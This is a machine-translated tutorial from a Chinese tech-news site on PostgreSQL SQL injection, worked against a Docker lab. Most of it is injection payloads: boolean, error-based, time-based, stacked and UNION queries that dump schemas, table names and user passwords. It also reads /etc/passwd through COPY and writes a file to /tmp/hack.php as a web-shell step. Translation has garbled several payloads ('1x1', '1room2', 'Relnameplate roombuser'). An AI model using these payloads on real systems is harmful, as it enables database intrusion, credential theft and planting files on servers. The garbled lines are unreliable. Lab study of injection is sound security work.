Shulou(Shulou.com)05/31 Report--

Editor to share with you the example analysis of postgresql injection, I believe that most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

PostgreSQL is a free object-relational database server (ORDBMS) distributed under a flexible BSD license.

PostgreSQL developers pronounce it as post-gress-Q-L.

PostgreSQL's Slogan is "the most advanced open source relational database in the world".

Here we learn about vulnerabilities in the postgresql database through a simple shooting range.

Browsers access data

Here we use docker to build the environment.

Visit our built address: http://172.16.1.238:90/index.php?uid=1

II. Verification injection

Based on Boolean injection (boolean-based blind)

Index.php?uid=1 AND 1x1 is operating normally

Abnormal operation of index.php?uid=1 AND 1room2

Error based injection (error-based)

Get the version number:

Select * from tbuser where id=1 AND 7778=CAST ((SELECT version ()):: text AS NUMERIC)

Get Schemas name

Select * from tbuser where id=1 AND 7778=CAST ((SELECT schemaname FROM pg_tables limit 1):: text AS NUMERIC)

Time-based blind injection (time-based blind)

AND 6489 = (SELECT 6489 FROM PG_SLEEP (5)) delay 5 seconds

Based on stacked queries (multi-statement queries, stacked queries)

? uid=1;select PG_SLEEP (5)-

Based on federated query (UNION query)

? uid=1 order by 1, 2, 3 is running normally.

? uid=1 order by 1, 2, 3, 4 runs abnormally, gets the number of fields 3

? uid=1 UNION ALL SELECT NULL, ('11111'), NULL-- to see if the output is 11111

Get database structure and content

Here are all federated queries

Get the schema name (schemaname) name

? uid=1 UNION SELECT NULL,COALESCE (CAST (schemaname AS CHARACTER (10000)), (CHR (32)), NULL FROM pg_tables--

Syntax parsing:

The COALESCE (expression [, n]) coalesce function returns the field value of the first non-NULL value in the parameter (column name). Note that it is not empty.

Cast ('1' as numeric) 1 converted to numeric type

Simplify:

? uid=1 UNION SELECT NULL,schemaname,NULL FROM pg_tables--

The default schema name (schemaname) of the user-created database is public

Get the data table name

Uid=1 UNION ALL SELECT NULL,tablename,NULL FROM pg_tables WHERE schemaname IN ('public')

Get table field name

? uid=1 UNION SELECT NULL,attname,NULL FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class an ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum > 0 AND a. Relnameplate roombuser 'AND nspname='public'-

Get table contents

? uid=1 UNION ALL SELECT NULL,id | |','| | username | |','| | passwd,NULL FROM public.tbuser--

III. File or directory operation

Some built-in functions and tables in PostgreSQL

Column directory-only files under the installation directory can be listed

Uid=1 union select NULL,NULL,pg_ls_dir ('. /')

Read the file? uid=1;CREATE TABLE passwd (t TEXT); COPY passwd FROM'/ etc/passwd';SELECT NULL,t,NULL FROM passwd

Write a file? uid=1;DROP TABLE pass; (here you need a table that exists for the database) CREATE TABLE hacktb (t TEXT); INSERT INTO hacktb (t) VALUES (''); COPY hacktb (t) TO'/ tmp/hack.php'

The above is all the content of the article "sample Analysis of postgresql injection". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.